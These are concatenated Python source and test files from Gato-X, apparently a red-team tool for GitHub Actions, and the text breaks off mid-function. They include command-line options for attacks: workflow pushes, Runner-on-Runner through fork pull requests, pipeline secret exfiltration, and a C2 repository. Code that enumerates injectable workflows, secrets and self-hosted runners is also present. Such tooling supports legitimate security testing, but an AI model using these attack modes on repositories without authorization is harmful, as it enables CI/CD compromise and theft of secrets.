            "selected_repositories_url": "https://api.github.com/orgs/testOrg/actions/secrets/GH_TOKEN/repositories",
        },
    ]

    mock_api.return_value.check_org_runners.return_value = {
        "total_count": 1,
        "runners": [
            {
                "id": 21,
                "name": "ghrunner-test",
                "os": "Linux",
                "status": "online",
                "busy": False,
                "labels": [
                    {"id": 1, "name": "self-hosted", "type": "read-only"},
                    {"id": 2, "name": "Linux", "type": "read-only"},
                    {"id": 3, "name": "X64", "type": "read-only"},
                ],
            }
        ],
    }

    mock_api.return_value.check_org_repos.side_effect = [[TEST_REPO_DATA], [], []]

    mock_api.return_value.get_secrets.return_value = [
        {
            "name": "TEST_SECRET",
            "created_at": "2019-08-10T14:59:22Z",
            "updated_at": "2020-01-10T14:59:22Z",
        }
    ]

    mock_api.return_value.get_repo_org_secrets.return_value = []

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        output_yaml=False,
        skip_log=True,
    )

    gh_enumeration_runner.enumerate_organization("github")

    out, err = capfd.readouterr()

    escaped_output = escape_ansi(out)
    assert (
        "The repository can access 1 secret(s) and the token can use a workflow to read them!"
        in escaped_output
    )
    assert "TEST_SECRET" in escaped_output
    assert "ghrunner-test" in escaped_output


@patch("gatox.enumerate.enumerate.Api")
def test_enum_repo_runner(mock_api, capfd):

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repo_runners.return_value = [
        {
            "id": 2,
            "name": "17e749a1b008",
            "os": "Linux",
            "status": "offline",
            "busy": False,
            "labels": [
                {"id": 1, "name": "self-hosted", "type": "read-only"},
                {
                    "id": 2,
                    "name": "Linux",
                    "type": "read-only",
                },
                {
                    "id": 3,
                    "name": "X64",
                    "type": "read-only",
                },
            ],
        }
    ]

    test_repodata = TEST_REPO_DATA.copy()

    test_repodata["permissions"]["admin"] = True

    mock_api.return_value.get_repository.return_value = test_repodata

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        output_yaml=False,
        skip_log=True,
    )

    gh_enumeration_runner.enumerate_repo_only("octocat/Hello-World")
    out, err = capfd.readouterr()

    escaped_output = escape_ansi(out)

    assert "The repository has 1 repo-level self-hosted runners!" in escaped_output

    assert "[!] The user is an administrator on the repository!" in escaped_output

    assert (
        "The runner has the following labels: self-hosted, Linux, X64!"
        in escaped_output
    )


@patch("gatox.enumerate.ingest.ingest.time")
@patch("gatox.enumerate.enumerate.Api")
def test_enum_repos(mock_api, mock_time, capfd):

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repository.return_value = TEST_REPO_DATA

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        output_yaml=False,
        skip_log=True,
    )

    gh_enumeration_runner.enumerate_repos(["octocat/Hello-World"])
    out, _ = capfd.readouterr()
    assert "Enumerating: octocat/Hello-World" in escape_ansi(out)
    mock_api.return_value.get_repository.assert_called_once_with("octocat/Hello-World")


@patch("gatox.enumerate.enumerate.Api")
def test_enum_repos_empty(mock_api, capfd):

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repository.return_value = TEST_REPO_DATA

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        output_yaml=False,
        skip_log=True,
    )

    gh_enumeration_runner.enumerate_repos([])
    out, _ = capfd.readouterr()
    assert "The list of repositories was empty!" in escape_ansi(out)
    mock_api.return_value.get_repository.assert_not_called()


@patch("gatox.enumerate.enumerate.Api")
def test_bad_token(mock_api):

    gh_enumeration_runner = Enumerator(
        "ghp_BADTOKEN",
        socks_proxy=None,
        http_proxy=None,
        output_yaml=False,
        skip_log=True,
    )

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = None

    val = gh_enumeration_runner.self_enumeration()

    assert val is False


@patch("gatox.enumerate.enumerate.Api")
def test_unscoped_token(mock_api, capfd):

    gh_enumeration_runner = Enumerator(
        "ghp_BADTOKEN",
        socks_proxy=None,
        http_proxy=None,
        output_yaml=False,
        skip_log=True,
    )

    mock_api.return_value.is_app_token.return_value = False
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["public_repo"],
    }

    status = gh_enumeration_runner.self_enumeration()

    out, _ = capfd.readouterr()
    assert "Self-enumeration requires the repo scope!" in escape_ansi(out)
    assert status is False


@patch("gatox.enumerate.enumerate.Api")
def test_enum_self_no_repos(mock_api, capfd):
    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        output_yaml=False,
        skip_log=True,
        output_json="test.json",
    )

    mock_api.return_value.is_app_token.return_value = False
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo"],
    }

    orgs, repos = gh_enumeration_runner.self_enumeration()

    assert orgs == []
    assert repos == []

    out, _ = capfd.readouterr()



import os
import pytest
import pathlib
import json

from .integration_utils import process_command
from .integration_utils import load_creds


def load_cases():
    """Load test cases from the test case JSON file."""
    curr_path = pathlib.Path(__file__).parent.resolve()

    with open(os.path.join(curr_path, "test_cases.json"), "r") as f:
        cases = json.load(f)

    creds = load_creds()

    parameters = []

    for case in cases:
        test_creds = creds[case["PAT"]]
        if test_creds["PAT_value"]:
            parameters.append((case, test_creds))

    return parameters


@pytest.mark.parametrize("test_details, test_creds", load_cases())
def test_gato(test_details, test_creds, capsys):

    if not test_creds["PAT_value"]:
        pytest.fail("The PAT was not set!!")

    os.environ["GH_TOKEN"] = test_creds["PAT_value"]

    output, error = process_command(test_details["invocation"], capsys)

    for assertion in test_details["assertions"]:

        print(output)

        if assertion["type"] == "stdout":
            assert assertion["expect"] in output
        else:
            assert assertion["expect"] in error

    if "extra_validation" in test_details:
        validation = test_details["extra_validation"]

        if validation["type"] == "file":

            with open(validation["filename"]) as file_check:
                file_contents = file_check.read()

                for assertion in validation["assertions"]:
                    assert assertion in file_contents



from gatox.util.arg_utils import ReadableFile, WriteableDir, StringType
from gatox.cli.output import Output


def configure_parser_attack(parser):
    """Helper method to add arguments to the attack subparser.

    Args:
        parser: The parser to add attack subarguments to.
    """
    parser.add_argument(
        "--target",
        "-t",
        help="Repository to target in attack.",
        metavar="ORG/REPO",
        required=False,
        type=StringType(80),
    )

    parser.add_argument(
        "--author-name",
        "-a",
        help="Name of the author that all git commits will be made under.\n"
        "Defaults to the user associated with the PAT.",
        metavar="AUTHOR",
        type=StringType(256),
    )

    parser.add_argument(
        "--author-email",
        "-e",
        help="Email that all git commits will be made under.\n"
        "Defaults to the e-mail associated with the PAT.",
        metavar="EMAIL",
        type=StringType(256),
    )

    parser.add_argument(
        "--branch",
        "-b",
        metavar="BRANCH",
        help="Target branch for the attack.\n"
        "For a PR attack, this will be the branch on the target repo the PR\n"
        "will be made to. Defaults to 'main'.\n"
        "For a workflow attack, this will be the branch changes will be\n"
        "pushed to. This cannot be a pre-existing branch. Defaults to a random\n"
        "string.",
        type=StringType(244),
    )

    parser.add_argument(
        "--message",
        "-m",
        metavar="COMMIT_MESSAGE",
        help="Commit message to use. This is displayed in the Actions tab for\n"
        "workflow attacks. Defaults to 'Test Commit'",
        default="Test Commit",
        type=StringType(256),
    )

    parser.add_argument(
        "--command",
        "-c",
        help="Command to execute as part of payload. Defaults to 'whoami'",
    )

    parser.add_argument(
        "--workflow",
        "-w",
        help="Attack by pushing a workflow to a feature branch.",
        action="store_true",
    )

    parser.add_argument(
        "--runner-on-runner",
        "-pr",
        help="Attack with Runner-on-Runner via a Fork Pull Request.",
        action="store_true",
    )

    parser.add_argument(
        "--secrets",
        "-sc",
        help="Attack to exfiltrate pipeline secrets.",
        action="store_true",
    )

    parser.add_argument(
        "--source-branch",
        "-sb",
        default="test",
        help="Name of the PR source branch, this will be displayed as\n"
        f"{Output.bright('user:branch_name')} when seen in the action approval\n"
        "page. Defaults to 'test'",
        type=StringType(244),
    )

    parser.add_argument(
        "--pr-title",
        "-pt",
        default="Test",
        help="Name of the PR that will be created. This will be displayed in\n"
        "the Actions tab and in the closed pull requests list once the\n"
        "tool quickly closes the PR. Defaults to 'Test'",
        metavar="NAME",
    )

    parser.add_argument(
        "--name",
        "-n",
        help="Name of the workflow. This will be shown in the actions tab.\n"
        "Defaults to 'test'",
        type=StringType(64),
    )

    parser.add_argument(
        "--file-name",
        "-fn",
        default="test",
        help=f"Name of yaml file {Output.bright('without extension')} that will be\n"
        "written as part of either attack type. Defaults to 'test'",
        type=StringType(64),
    )

    parser.add_argument(
        "--custom-file",
        "-f",
        help="Path to a yaml workflow that will be uploaded instead of a\n"
        "single shell command. A custom shell command or workflow name\n"
        "cannot be used with this option, as it is specified in the\n"
        "file. Only works for push.",
        metavar="PATH/TO/FILE.YML",
        type=ReadableFile(),
    )

    parser.add_argument(
        "--delete-run",
        "-d",
        help="Delete the resulting workflow run. Requires write permission the target repository.",
        action="store_true",
    )

    parser.add_argument(
        "--timeout",
        "-to",
        metavar="SECONDS",
        help="Timeout, in seconds, to wait for the Workflow to queue and\n"
        "execute. For fork PR attacks, this is the time, in seconds, to wait "
        "for the fork repository to be created. Defaults to '30'",
        default="30",
        type=int,
    )

    parser.add_argument(
        "--c2-repo",
        metavar="C2_REPO",
        help="Name of an existing Gato-X C2 repository in Owner/Repo format.",
    )

    parser.add_argument(
        "--interact",
        action="store_true",
        help="Connect to a C2 repository and interact with connected runners.",
        default=False,
    )

    parser.add_argument(
        "--labels",
        metavar="LABELS",
        help="List of labelsp to request for self-hosted runner attacks. Defaults to `self-hosted`.",
        nargs="+",
        default=["self-hosted"],
    )

    parser.add_argument(
        "--target-os",
        metavar="TARGET_OS",
        help="Operating system for Runner-on-Runner attack. Options: windows, linux, osx.",
        choices=["win", "linux", "osx"],
    )

    parser.add_argument(
        "--target-arch",
        metavar="TARGET_ARCH",
        help="Architecture for Runner-on-Runner attack. Options: arm, arm64, x64. Windows and OSX only support arm64 and x64.",
        choices=["arm", "arm64", "x64"],
    )

    parser.add_argument(
        "--keep-alive",
        help="Keep the workflow running after deploying a RoR, this is for exploiting ephemeral self-hosted runners.",
        default=False,
        action="store_true",
    )

    parser.add_argument(
        "--payload-only",
        help="Generaate payloads with the specified C2 repository or creates a new one. Used for manually deploying runner on runner.",
        default=False,
        action="store_true",
    )



import logging

from datetime import datetime, timedelta

from gatox.cli.output import Output
from gatox.models.execution import Repository
from gatox.models.secret import Secret
from gatox.models.runner import Runner
from gatox.github.api import Api
from gatox.workflow_parser.workflow_parser import WorkflowParser
from gatox.workflow_parser.composite_parser import CompositeParser
from gatox.caching.cache_manager import CacheManager
from gatox.notifications.send_webhook import send_slack_webhook

logger = logging.getLogger(__name__)


class RepositoryEnum:
    """Repository specific enumeration functionality."""

    def __init__(self, api: Api, skip_log: bool, output_yaml):
        """Initialize enumeration class with instantiated API wrapper and CLI
        parameters.

        Args:
            api (Api): GitHub API wraper object.
        """
        self.api = api
        self.skip_log = skip_log
        self.output_yaml = output_yaml
        self.temp_wf_cache = {}

    def __perform_runlog_enumeration(self, repository: Repository, workflows: list):
        """Enumerate for the presence of a self-hosted runner based on
        downloading historical runlogs.

        Args:
            repository (Repository): Wrapped repository object.
            workflows (list): List of workflows that execute on self-hosted runner.

        Returns:
            bool: True if a self-hosted runner was detected.
        """
        runner_detected = False
        wf_runs = []

        wf_runs = self.api.retrieve_run_logs(
            repository.name, short_circuit=True, workflows=workflows
        )

        if wf_runs:
            for wf_run in wf_runs:
                runner = Runner(
                    wf_run["runner_name"],
                    wf_run["runner_type"],
                    wf_run["token_permissions"],
                    runner_group=wf_run["runner_group"],
                    machine_name=wf_run["machine_name"],
                    labels=wf_run["requested_labels"],
                    non_ephemeral=wf_run["non_ephemeral"],
                )

                repository.add_accessible_runner(runner)
            runner_detected = True

        return runner_detected

    def __create_info_package(
        self, workflow_name, workflow_url, details, rules, parent_workflow=None
    ):
        """Create information package for slack webhook."""
        package = {
            "workflow_name": workflow_name,
            "workflow_url": workflow_url,
            "details": details,
            "environments": rules,
        }

        if parent_workflow:
            package["parent_workflow"] = parent_workflow
        return package

    @staticmethod
    def __is_within_last_day(timestamp_str, format="%Y-%m-%dT%H:%M:%SZ"):
        # Convert the timestamp string to a datetime object
        date = datetime.strptime(timestamp_str, format)

        # Get the current date and time
        now = datetime.now()
        # Calculate the date 1 days ago
        one_day_ago = now - timedelta(days=1)

        # Return True if the date is within the last day, False otherwise
        return one_day_ago <= date <= now

    @staticmethod
    def __return_recent(time1, time2, format="%Y-%m-%dT%H:%M:%SZ"):
        """
        Takes two timestamp strings and returns the most recent one.

        Args:
            time1 (str): The first timestamp string.
            time2 (str): The second timestamp string.
            format (str): The format of the timestamp strings. Default is '%Y-%m-%dT%H:%M:%SZ'.

        Returns:
            str: The most recent timestamp string.
        """
        # Convert the timestamp strings to datetime objects
        date1 = datetime.strptime(time1, format)
        date2 = datetime.strptime(time2, format)

        # Return the most recent timestamp string
        return time1 if date1 > date2 else time2

    @staticmethod
    def __parse_github_path(path):
        parts = path.split("@")
        ref = parts[1] if len(parts) > 1 else "main"
        repo_path = parts[0].split("/")
        repo_slug = "/".join(repo_path[0:2])
        file_path = "/".join(repo_path[2:]) if len(repo_path) > 1 else ""

        return repo_slug, file_path, ref

    def __get_callee(self, callee, repository: Repository):
        """Retrieve the callee workflow."""
        if "@" in callee:
            slug, path, ref = RepositoryEnum.__parse_github_path(callee)
            callee_wf = CacheManager().get_workflow(slug, f"{path}:{ref}")
            if not callee_wf:
                callee_wf = self.api.retrieve_repo_file(
                    slug, path, ref, public=repository.is_public()
                )
                if callee_wf:
                    CacheManager().set_workflow(slug, f"{path}:{ref}", callee_wf)
        else:
            callee_wf = CacheManager().get_workflow(repository.name, callee)
        if not callee_wf:
            callee_wf = self.api.retrieve_workflow_yml(repository.name, callee)

        if callee_wf:
            callee_wf = WorkflowParser(callee_wf)
            self.temp_wf_cache.update({callee_wf.wf_name: callee_wf})

        return callee_wf

    def __check_callees(
        self, parsed_yml: WorkflowParser, repository: Repository, env_rules
    ):
        """Check callee workflows within a repository."""
        if parsed_yml.callees:
            for callee in parsed_yml.callees:

                if callee in self.temp_wf_cache:
                    callee_wf = self.temp_wf_cache[callee]
                else:
                    callee_wf = self.__get_callee(callee, repository)

                if callee_wf:
                    sub_injection = callee_wf.check_injection(bypass=True)
                    if callee_wf.is_referenced():
                        workflow_url = (
                            f"https://github.com/{callee_wf.repo_name}/"
                            f"blob/{callee_wf.branch}/{callee_wf.external_path}"
                        )
                    else:
                        workflow_url = (
                            f"{repository.repo_data['html_url']}/blob/"
                            f"{repository.repo_data['default_branch']}/.github/workflows/{callee_wf.wf_name}"
                        )

                    if sub_injection:
                        sub_injection["triggers"] = parsed_yml.get_vulnerable_triggers()
                        injection_package = self.__create_info_package(
                            callee_wf.wf_name,
                            workflow_url,
                            sub_injection,
                            env_rules,
                            parent_workflow=parsed_yml.wf_name,
                        )
                        repository.set_injection(injection_package)
                    sub_pwn = callee_wf.check_pwn_request(bypass=True)
                    if sub_pwn:
                        sub_pwn["triggers"] = parsed_yml.get_vulnerable_triggers()
                        pwn_package = self.__create_info_package(
                            callee_wf.wf_name,
                            workflow_url,
                            sub_pwn,
                            env_rules,
                            parent_workflow=parsed_yml.wf_name,
                        )
                        repository.set_pwn_request(pwn_package)

    def __retrieve_composites(self, repository: Repository, referenced_actions: dict):
        """Retrieve composite actions and set them to the cache."""

        actions = []
        if self.api.github_url == "https://api.github.com":
            for composite in referenced_actions.values():
                if composite["local"]:
                    action = CacheManager().get_action(
                        composite["repo"],
                        composite["path"],
                        repository.repo_data["default_branch"],
                    )

                    if action:
                        actions.append(action)
                        continue

                    contents = self.api.retrieve_raw_action(
                        composite["repo"],
                        composite["path"],
                        repository.repo_data["default_branch"],
                    )
                else:
                    action = CacheManager().get_action(
                        composite["repo"], composite["path"], composite["ref"]
                    )
                    if action:
                        actions.append(action)
                        continue

                    contents = self.api.retrieve_raw_action(
                        composite["repo"], composite["path"], composite["ref"]
                    )

                if contents:
                    parsed_action = CompositeParser(contents)
                    actions.append(parsed_action)
                    CacheManager().set_action(
                        composite["repo"],
                        composite["path"],
                        composite["ref"],
                        parsed_action,
                    )
        return [action for action in actions if action.is_composite()]

    def __perform_yml_enumeration(self, repository: Repository):
        """Enumerates the repository using the API to extract yml files. This
        does not generate any git clone audit log events.

        Args:
            repository (Repository): Wrapped repository object.

        Returns:
            list: List of workflows that execute on sh runner, empty otherwise.
        """
        runner_wfs = []
        self.temp_wf_cache.clear()

        if CacheManager().is_repo_cached(repository.name):
            ymls = CacheManager().get_workflows(repository.name)
        else:
            ymls = self.api.retrieve_workflow_ymls(repository.name)

        for workflow in ymls:
            if workflow.isInvalid():
                Output.warn(f"Workflow {workflow.workflow_name} was invalid!")
                continue
            try:
                # if we already cached it, then retrieve.
                if workflow.workflow_name in self.temp_wf_cache:
                    parsed_yml = self.temp_wf_cache[workflow.workflow_name]
                else:
                    parsed_yml = WorkflowParser(workflow)
                    if parsed_yml.has_trigger("workflow_call"):
                        self.temp_wf_cache.update({parsed_yml.wf_name: parsed_yml})

                self_hosted_jobs = parsed_yml.self_hosted()
                wf_injection = parsed_yml.check_injection()
                pwn_reqs = parsed_yml.check_pwn_request()

                # Disable for now - composite parsing slows
                # things down a lot and actions have more
                # eyes on them in general.
                if (
                    False
                    and repository.is_public()
                    and parsed_yml.get_vulnerable_triggers()
                ):
                    # We only check this for public repos, as
                    # we cannot use a non-API call to retrieve the file.
                    composites = self.__retrieve_composites(
                        repository, parsed_yml.composites
                    )
                    for composite in composites:
                        comp_inj = composite.check_injection()
                        if comp_inj:
                            print(composite.name)

                        comp_pwn = composite.check_pwn_request()
                        if comp_pwn:
                            print(composite.name)

                if workflow.branch:
                    workflow_url = (
                        f"{repository.repo_data['html_url']}/blob/"
                        f"{parsed_yml.branch}/.github/workflows/{parsed_yml.wf_name}"
                    )
                else:
                    workflow_url = (
                        f"{repository.repo_data['html_url']}/blob/"
                        f"{repository.repo_data['default_branch']}/"
                        f".github/workflows/{parsed_yml.wf_name}"
                    )

                # We aren't interested in pwn request or injection vulns in forks
                # they are likely not viable due to actions being disabled or there
                # is no impact.
                skip_checks = False
                if pwn_reqs or wf_injection:
                    if repository.is_fork():
                        skip_checks = True

                # If we have detected either pwn requests or injection, then make a
                # single request to see if there are any protection rules, if there are
                # then we save them off. Currently a hack - push this down and use
                # a direct query.
                if (
                    wf_injection or pwn_reqs
                ) and "environment:" in workflow.workflow_contents:
                    rules = self.api.get_all_environment_protection_rules(
                        repository.name
                    )
                    if parsed_yml.check_rules(rules):
                        # If the rules we actually use have no requirements, skip
                        rules = []
                else:
                    rules = []

                # Checks any local workflows referenced by this
                self.__check_callees(parsed_yml, repository, rules)

                report_packages = []
                if wf_injection and not skip_checks and not rules:
                    report_package = self.__create_info_package(
                        parsed_yml.wf_name, workflow_url, wf_injection, rules
                    )
                    report_packages.append(report_package)
                    repository.set_injection(report_package)

                if pwn_reqs and not skip_checks:
                    report_package = self.__create_info_package(
                        parsed_yml.wf_name, workflow_url, pwn_reqs, rules
                    )
                    report_packages.append(report_package)
                    repository.set_pwn_request(report_package)

                for report_package in report_packages:
                    # We first check the result from GQL, if the last push was within 24 hours,
                    # then we check if the last push impacted the specific workflow.

                    if self.__is_within_last_day(repository.repo_data["pushed_at"]):
                        commit_date, author, sha = self.api.get_file_last_updated(
                            repository.name, ".github/workflows/" + parsed_yml.wf_name
                        )

                        merge_date = self.api.get_commit_merge_date(
                            repository.name, sha
                        )
                        if merge_date:
                            # If there is a PR merged, get the most recent.
                            commit_date = self.__return_recent(commit_date, merge_date)

                        if (
                            self.__is_within_last_day(commit_date)
                            and "[bot]" not in author
                        ):
                            send_slack_webhook(report_package)

                if self_hosted_jobs:
                    runner_wfs.append(parsed_yml.wf_name)

                if self.output_yaml:
                    success = parsed_yml.output(self.output_yaml)
                    if not success:
                        logger.warning("Failed to write yml to disk!")

            except ValueError as parse_error:
                print(parse_error)
                Output.warn("Encountered malformed workflow!")
            except Exception as general_error:
                Output.error(
                    "Encountered a Gato-X error (likely a bug) while processing a workflow:"
                )
                import traceback

                traceback.print_exc()
                print(f"{workflow.workflow_name}: {str(general_error)}")

        return runner_wfs

    def enumerate_repository(self, repository: Repository, large_org_enum=False):
        """Enumerate a repository, and check everything relevant to
        self-hosted runner abuse that that the user has permissions to check.

        Args:
            repository (Repository): Wrapper object created from calling the
            API and retrieving a repository.
            large_org_enum (bool, optional): Whether to only
            perform run log enumeration if workflow analysis indicates likely
            use of a self-hosted runner. Defaults to False.
        """
        runner_detected = False

        repository.update_time()

        if not repository.can_pull():
            Output.error("The user cannot pull, skipping.")
            return

        if repository.is_admin():
            runners = self.api.get_repo_runners(repository.name)

            if runners:
                repo_runners = [
                    Runner(
                        runner,
                        machine_name=None,
                        os=runner["os"],
                        status=runner["status"],
                        labels=runner["labels"],
                    )
                    for runner in runners
                ]

                repository.set_runners(repo_runners)

        workflows = self.__perform_yml_enumeration(repository)

        if len(workflows) > 0:
            repository.add_self_hosted_workflows(workflows)
            runner_detected = True

        if not self.skip_log:
            # If we are enumerating an organization, only enumerate runlogs if
            # the workflow suggests a sh_runner.
            if large_org_enum and runner_detected:
                self.__perform_runlog_enumeration(repository, workflows)

            # If we are doing internal enum, get the logs, because coverage is
            # more important here and it's ok if it takes time.
            elif not repository.is_public() or not large_org_enum:
                runner_detected = self.__perform_runlog_enumeration(
                    repository, workflows
                )

        if runner_detected:
            # Only display permissions (beyond having none) if runner is
            # detected.
            repository.sh_runner_access = True

    def enumerate_repository_secrets(self, repository: Repository):
        """Enumerate secrets accessible to a repository.

        Args:
            repository (Repository): Wrapper object created from calling the
            API and retrieving a repository.
        """
        if repository.can_push():
            secrets = self.api.get_secrets(repository.name)
            wrapped_env_secrets = []
            for environment in repository.repo_data["environments"]:
                env_secrets = self.api.get_environment_secrets(
                    repository.name, environment
                )
                for secret in env_secrets:
                    wrapped_env_secrets.append(
                        Secret(secret, repository.name, environment)
                    )

            repo_secrets = [Secret(secret, repository.name) for secret in secrets]

            repo_secrets.extend(wrapped_env_secrets)
            repository.set_secrets(repo_secrets)

            org_secrets = self.api.get_repo_org_secrets(repository.name)
            org_secrets = [
                Secret(secret, repository.org_name) for secret in org_secrets
            ]

            if org_secrets:
                repository.set_accessible_org_secrets(org_secrets)



import logging
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import as_completed

from gatox.github.api import Api
from gatox.github.gql_queries import GqlQueries
from gatox.models.repository import Repository
from gatox.models.organization import Organization
from gatox.cli.output import Output
from gatox.enumerate.repository import RepositoryEnum
from gatox.enumerate.organization import OrganizationEnum
from gatox.enumerate.recommender import Recommender
from gatox.enumerate.ingest.ingest import DataIngestor
from gatox.caching.cache_manager import CacheManager

logger = logging.getLogger(__name__)


class Enumerator:
    """Class holding all high level logic for enumerating GitHub, whether it is
    a user's entire access, individual organizations, or repositories.
    """

    def __init__(
        self,
        pat: str,
        socks_proxy: str = None,
        http_proxy: str = None,
        output_yaml: str = None,
        skip_log: bool = False,
        github_url: str = None,
        output_json: str = None,
    ):
        """Initialize enumeration class with arguments sent by user.

        Args:
            pat (str): GitHub personal access token
            socks_proxy (str, optional): Proxy settings for SOCKS proxy.
            Defaults to None.
            http_proxy (str, optional): Proxy gettings for HTTP proxy.
            Defaults to None.
            output_yaml (str, optional): If set, directory to save all yml
            files to . Defaults to None.
            skip_log (bool, optional): If set, then run logs will not be
            downloaded.
            output_json (str, optional): JSON file to output enumeration
            results.
        """
        self.api = Api(
            pat,
            socks_proxy=socks_proxy,
            http_proxy=http_proxy,
            github_url=github_url,
        )

        self.socks_proxy = socks_proxy
        self.http_proxy = http_proxy
        self.skip_log = skip_log
        self.output_yaml = output_yaml
        self.user_perms = None
        self.github_url = github_url
        self.output_json = output_json

        self.repo_e = RepositoryEnum(self.api, skip_log, output_yaml)
        self.org_e = OrganizationEnum(self.api)

    def __setup_user_info(self):
        """Sets up user/app token information."""
        if not self.user_perms and self.api.is_app_token():
            installation_info = self.api.get_installation_repos()

            if installation_info:
                count = installation_info["total_count"]
                if count > 0:
                    Output.info(
                        f"Gato-X is using valid a GitHub App installation token!"
                    )
                    self.user_perms = {
                        "user": "Github App",
                        "scopes": [],
                        "name": "GATO-X App Mode",
                    }

                    return True
                else:
                    return False

        if not self.user_perms:
            self.user_perms = self.api.check_user()
            if not self.user_perms:
                Output.error("This token cannot be used for enumeration!")
                return False

            Output.info(
                "The authenticated user is: "
                f"{Output.bright(self.user_perms['user'])}"
            )
            if len(self.user_perms["scopes"]):
                Output.info(
                    "The GitHub Classic PAT has the following scopes: "
                    f'{Output.yellow(", ".join(self.user_perms["scopes"]))}'
                )
            else:
                Output.warn("The token has no scopes!")

        return True

    def __query_graphql_workflows(self, queries):
        """Wrapper for querying workflows using the github graphql API.

        Since this is an IO heavy operation, we use a threadpool with 3 workers.
        """
        with ThreadPoolExecutor(max_workers=3) as executor:
            Output.info(f"Querying repositories in {len(queries)} batches!")
            futures = []
            for i, wf_query in enumerate(queries):
                futures.append(
                    executor.submit(DataIngestor.perform_query, self.api, wf_query, i)
                )
            for future in as_completed(futures):
                Output.info(
                    f"Processed {DataIngestor.check_status()}/{len(queries)} batches.",
                    end="\r",
                )
                DataIngestor.construct_workflow_cache(future.result())

    def validate_only(self):
        """Validates the PAT access and exits."""
        if not self.__setup_user_info():
            return False

        if "repo" not in self.user_perms["scopes"]:
            Output.warn("Token does not have sufficient access to list orgs!")
            return False

        orgs = self.api.check_organizations()

        Output.info(
            f'The user { self.user_perms["user"] } belongs to {len(orgs)} '
            "organizations!"
        )

        for org in orgs:
            Output.tabbed(f"{Output.bright(org)}")

        return [
            Organization({"login": org}, self.user_perms["scopes"], True)
            for org in orgs
        ]

    def self_enumeration(self):
        """Enumerates all organizations associated with the authenticated user.

        Returns:
            bool: False if the PAT is not valid for enumeration.
            (list, list): Tuple containing list of orgs and list of repos.
        """

        self.__setup_user_info()

        if not self.user_perms:
            return False

        if "repo" not in self.user_perms["scopes"]:
            Output.error("Self-enumeration requires the repo scope!")
            return False

        Output.info("Enumerating user owned repositories!")

        repos = self.api.get_own_repos()
        repo_wrappers = self.enumerate_repos(repos)
        orgs = self.api.check_organizations()

        Output.info(
            f'The user { self.user_perms["user"] } belongs to {len(orgs)} '
            "organizations!"
        )

        for org in orgs:
            Output.tabbed(f"{Output.bright(org)}")

        org_wrappers = list(map(self.enumerate_organization, orgs))

        return org_wrappers, repo_wrappers

    def enumerate_user(self, user: str):
        """Enumerate a user's repositories."""

        if not self.__setup_user_info():
            return False

        repos = self.api.get_user_repos(user)

        if not repos:
            Output.warn(
                f"Unable to query the user: {Output.bright(user)}! Ensure the "
                "user exists!"
            )
            return False

        Output.result(f"Enumerating the {Output.bright(user)} user!")

        repo_wrappers = self.enumerate_repos(repos)

        return repo_wrappers

    def enumerate_organization(self, org: str):
        """Enumerate an entire organization, and check everything relevant to
        self-hosted runner abuse that that the user has permissions to check.

        Args:
            org (str): Organization to perform enumeration on.

        Returns:
            bool: False if a failure occurred enumerating the organization.
        """

        if not self.__setup_user_info():
            return False

        details = self.api.get_organization_details(org)

        if not details:
            Output.warn(
                f"Unable to query the org: {Output.bright(org)}! Ensure the "
                "organization exists!"
            )
            return False

        organization = Organization(details, self.user_perms["scopes"])

        Output.result(f"Enumerating the {Output.bright(org)} organization!")

        if organization.org_admin_user and organization.org_admin_scopes:
            self.org_e.admin_enum(organization)

        Recommender.print_org_findings(self.user_perms["scopes"], organization)

        Output.info("Querying repository list!")
        enum_list = self.org_e.construct_repo_enum_list(organization)

        Output.info(
            f"About to enumerate "
            f"{len(enum_list)} "
            "non-archived repos within "
            f"the {organization.name} organization!"
        )

        Output.info(f"Querying and caching workflow YAML files!")
        wf_queries = GqlQueries.get_workflow_ymls(enum_list)
        self.__query_graphql_workflows(wf_queries)

        try:
            for repo in enum_list:
                if repo.is_archived():
                    continue
                if self.skip_log and repo.is_fork():
                    continue
                Output.tabbed(f"Enumerating: {Output.bright(repo.name)}!")

                cached_repo = CacheManager().get_repository(repo.name)
                if cached_repo:
                    repo = cached_repo

                self.repo_e.enumerate_repository(
                    repo, large_org_enum=len(enum_list) > 25
                )
                self.repo_e.enumerate_repository_secrets(repo)

                organization.set_repository(repo)

                Recommender.print_repo_secrets(self.user_perms["scopes"], repo.secrets)
                Recommender.print_repo_runner_info(repo)
                Recommender.print_repo_attack_recommendations(
                    self.user_perms["scopes"], repo
                )
        except KeyboardInterrupt:
            Output.warn("Keyboard interrupt detected, exiting enumeration!")

        return organization

    def enumerate_repo_only(self, repo_name: str, large_enum=False):
        """Enumerate only a single repository. No checks for org-level
        self-hosted runners will be performed in this case.

        Args:
            repo_name (str): Repository name in {Org/Owner}/Repo format.
            large_enum (bool, optional): Whether to only download
            run logs when workflow analysis detects runners. Defaults to False.
        """
        if not self.__setup_user_info():
            return False

        repo = CacheManager().get_repository(repo_name)

        if not repo:
            repo_data = self.api.get_repository(repo_name)
            if repo_data:
                repo = Repository(repo_data)

        if repo:
            if repo.is_archived():
                Output.tabbed(
